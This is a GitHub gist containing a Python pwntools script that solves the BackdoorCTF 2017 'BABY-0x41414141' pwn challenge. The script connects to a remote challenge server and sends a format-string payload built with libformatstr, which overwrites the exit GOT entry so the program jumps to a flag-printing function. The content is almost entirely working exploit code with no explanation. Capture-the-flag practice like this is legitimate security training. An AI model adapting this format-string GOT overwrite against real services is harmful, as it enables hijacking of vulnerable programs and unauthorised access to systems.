Skip to content

Instantly share code, notes, and snippets.

@0xPwny
Created September 24, 2017 16:15
Show Gist options
  • Save 0xPwny/5a245e89a388f70dba78ce43f428bd14 to your computer and use it in GitHub Desktop.
Save 0xPwny/5a245e89a388f70dba78ce43f428bd14 to your computer and use it in GitHub Desktop.
BackdoorCTF 2017 - PWN - BABY-0x41414141
from pwn import *
from libformatstr import *
file = ELF("./32_new")
flag = 0x0804870b
r = remote("163.172.176.29",9035)
r.recvuntil("name?")
p = FormatStr()
#rop = [file.symbols["system"],0x80488e0]
p[file.got["exit"]] = flag #rop
pld = p.payload(10,0)
r.sendline(pld)
print r.recvall()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment